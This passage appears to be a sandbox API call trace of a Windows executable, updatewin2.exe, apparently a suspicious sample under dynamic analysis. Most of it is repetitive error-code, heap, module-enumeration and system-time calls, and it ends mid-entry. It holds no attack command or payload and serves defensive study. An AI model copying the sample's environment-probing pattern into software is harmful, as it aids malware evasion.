!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\"\n=\x82\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0130.242] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43acc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe")) returned 0x5f [0130.242] GetLastError () returned 0x0 [0130.242] SetLastError (dwErrCode=0x0) [0130.242] GetLastError () returned 0x0 [0130.242] SetLastError (dwErrCode=0x0) [0130.242] GetLastError () returned 0x0 [0130.242] SetLastError (dwErrCode=0x0) [0130.242] GetLastError () returned 0x0 [0130.242] SetLastError (dwErrCode=0x0) [0130.242] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.243] GetLastError () returned 0x0 [0130.243] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.244] GetLastError () returned 0x0 [0130.244] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.245] SetLastError (dwErrCode=0x0) [0130.245] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.246] SetLastError (dwErrCode=0x0) [0130.246] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.247] GetLastError () returned 0x0 [0130.247] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.248] SetLastError (dwErrCode=0x0) [0130.248] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.249] SetLastError (dwErrCode=0x0) [0130.249] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x0, Size=0x68) returned 0x1d11990 [0130.250] GetLastError () returned 0x0 [0130.250] SetLastError (dwErrCode=0x0) [0130.250] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.251] SetLastError (dwErrCode=0x0) [0130.251] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.252] SetLastError (dwErrCode=0x0) [0130.252] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.253] SetLastError (dwErrCode=0x0) [0130.253] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.254] GetLastError () returned 0x0 [0130.254] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.255] SetLastError (dwErrCode=0x0) [0130.255] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.256] SetLastError (dwErrCode=0x0) [0130.256] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.257] SetLastError (dwErrCode=0x0) [0130.257] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.258] SetLastError (dwErrCode=0x0) [0130.258] GetLastError () returned 0x0 [0130.259] SetLastError (dwErrCode=0x0) [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x98) returned 0x1d11a00 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x1f) returned 0x1d11aa0 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x36) returned 0x1d11ac8 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x37) returned 0x1d11b08 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x3c) returned 0x1d11b48 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x31) returned 0x1d11b90 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x17) returned 0x1d11bd0 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x24) returned 0x1d11bf0 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x14) returned 0x1d11c20 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0xd) returned 0x1d11c40 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x25) returned 0x1d11c58 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x39) returned 0x1d11c88 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x18) returned 0x1d11cd0 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x17) returned 0x1d11cf0 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0xe) returned 0x1d11d10 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x69) returned 0x1d11d28 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x3e) returned 0x1d11da0 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x1b) returned 0x1d11de8 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x1d) returned 0x1d11e10 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x48) returned 0x1d11e38 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x12) returned 0x1d11e88 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x18) returned 0x1d11ea8 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x1b) returned 0x1d11ec8 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x24) returned 0x1d11ef0 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x29) returned 0x1d11f20 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x1e) returned 0x1d11f58 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x41) returned 0x1d11f80 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x17) returned 0x1d11fd0 [0130.259] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0xf) returned 0x1d11ff0 [0130.260] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x16) returned 0x1d12008 [0130.260] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x2a) returned 0x1d12028 [0130.260] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x29) returned 0x1d12060 [0130.260] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x15) returned 0x1d12098 [0130.260] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x1e) returned 0x1d120b8 [0130.260] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x2a) returned 0x1d120e0 [0130.260] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x12) returned 0x1d12118 [0130.260] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x18) returned 0x1d12138 [0130.260] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x46) returned 0x1d12158 [0130.260] HeapFree (in: hHeap=0x1d10000, dwFlags=0x0, lpMem=0x1d111f8 | out: hHeap=0x1d10000) returned 1 [0130.261] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x800) returned 0x1d121a8 [0130.261] RtlAllocateHeap (HeapHandle=0x1d10000, Flags=0x8, Size=0x80) returned 0x1d111f8 [0130.261] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e49) returned 0x0 [0130.261] RtlSizeHeap (HeapHandle=0x1d10000, Flags=0x0, MemoryPointer=0x1d111f8) returned 0x80 [0130.262] GetLastError () returned 0x0 [0130.262] SetLastError (dwErrCode=0x0) [0130.262] GetLastError () returned 0x0 [0130.262] SetLastError (dwErrCode=0x0) [0130.262] GetLastError () returned 0x0 [0130.262] SetLastError (dwErrCode=0x0) [0130.262] GetLastError () returned 0x0 [0130.262] SetLastError (dwErrCode=0x0) [0130.262] GetLastError () returned 0x0 [0130.262] SetLastError (dwErrCode=0x0) [0130.262] GetLastError () returned 0x0 [0130.262] SetLastError (dwErrCode=0x0) [0130.262] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.263] SetLastError (dwErrCode=0x0) [0130.263] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.264] GetLastError () returned 0x0 [0130.264] SetLastError (dwErrCode=0x0) [0130.265] GetLastError () returned 0x0 [0130.265] SetLastError (dwErrCode=0x0) [0130.265] GetLastError () returned 0x0 [0130.265] SetLastError (dwErrCode=0x0) [0130.265] GetLastError () returned 0x0 [0130.265] SetLastError (dwErrCode=0x0) [0130.265] GetLastError () returned 0x0 [0130.265] SetLastError (dwErrCode=0x0) [0130.265] GetLastError () returned 0x0 [0130.265] SetLastError (dwErrCode=0x0) [0130.265] GetLastError () returned 0x0 [0130.265] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0130.266] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0130.266] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0130.266] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0130.342] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0130.343] PeekMessageA (in: lpMsg=0x18fa44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa44) returned 0 [0130.343] GetTickCount () returned 0x1153cb3 [0130.343] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.343] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.343] GetACP () returned 0x4e4 [0130.343] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.344] GetACP () returned 0x4e4 [0130.344] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.344] GetACP () returned 0x4e4 [0130.344] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.344] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.344] GetACP () returned 0x4e4 [0130.344] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.345] GetACP () returned 0x4e4 [0130.345] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, 